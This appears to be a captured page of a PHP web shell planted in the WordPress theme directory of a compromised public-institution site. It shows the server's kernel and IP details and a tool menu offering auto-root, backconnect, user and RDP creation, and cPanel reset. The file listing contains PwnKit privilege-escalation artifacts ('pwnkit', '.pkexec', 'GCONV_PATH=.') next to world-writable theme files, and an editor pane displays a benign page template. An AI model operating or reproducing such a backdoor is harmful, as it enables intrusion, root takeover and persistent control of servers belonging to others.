Linux 700ba4e1d92d 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Apache/2.4.67 (Debian)
: 172.18.0.2 | : 216.73.217.30
Cant Read [ /etc/named.conf ]
8.2.31
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
wp-content /
themes /
mpcma-theme /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxrwxrwx
template-parts
[ DIR ]
drwxrwxrwx
.DS_Store
6
KB
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
archive-ato_normativo.php
12.96
KB
-rwxrwxrwx
archive-parecer.php
1.24
KB
-rwxrwxrwx
footer.php
3.58
KB
-rwxrwxrwx
front-page.php
7.12
KB
-rwxrwxrwx
functions.php
9.54
KB
-rwxrwxrwx
header.php
2.19
KB
-rwxrwxrwx
home.php
1.27
KB
-rwxrwxrwx
index.php
7.07
KB
-rwxrwxrwx
page-acesso-a-informacao.php
3.61
KB
-rwxrwxrwx
page-contato.php
3.53
KB
-rwxrwxrwx
page-institucional.php
3.79
KB
-rwxrwxrwx
page-mapa-do-site.php
2.51
KB
-rwxrwxrwx
page.php
693
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
screenshot-readme.txt
73
B
-rwxrwxrwx
single.php
876
B
-rwxrwxrwx
style.css
499
B
-rwxrwxrwx
taxonomy-tipo_ato.php
2.64
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : archive-parecer.php
<?php get_header(); ?> <div class="page-hero"> <h1>Pareceres</h1> <p class="breadcrumb"><a href="<?php echo home_url(); ?>">Início</a> › Pareceres</p> </div> <div class="page-content"> <iframe id="pareceres-frame" src="https://ministerio-app.apps.tcema.tc.br" style="width:100%; border:none; min-height:800px; display:block;" title="Pareceres - MPC-MA" loading="lazy" allowfullscreen> </iframe> </div> <script> // Ajusta altura do iframe automaticamente conforme o conteúdo (function () { const frame = document.getElementById('pareceres-frame'); // Tenta redimensionar via postMessage (se a página Vue enviar altura) window.addEventListener('message', function (e) { if (e.origin !== 'https://ministerio-app.apps.tcema.tc.br') return; if (e.data && e.data.height) { frame.style.height = e.data.height + 'px'; } }); // Fallback: altura fixa generosa enquanto não há postMessage frame.addEventListener('load', function () { try { const h = frame.contentWindow.document.body.scrollHeight; if (h > 400) frame.style.height = h + 'px'; } catch (e) { // Cross-origin bloqueia acesso direto — postMessage é o caminho } }); })(); </script> <?php get_footer(); ?>
Close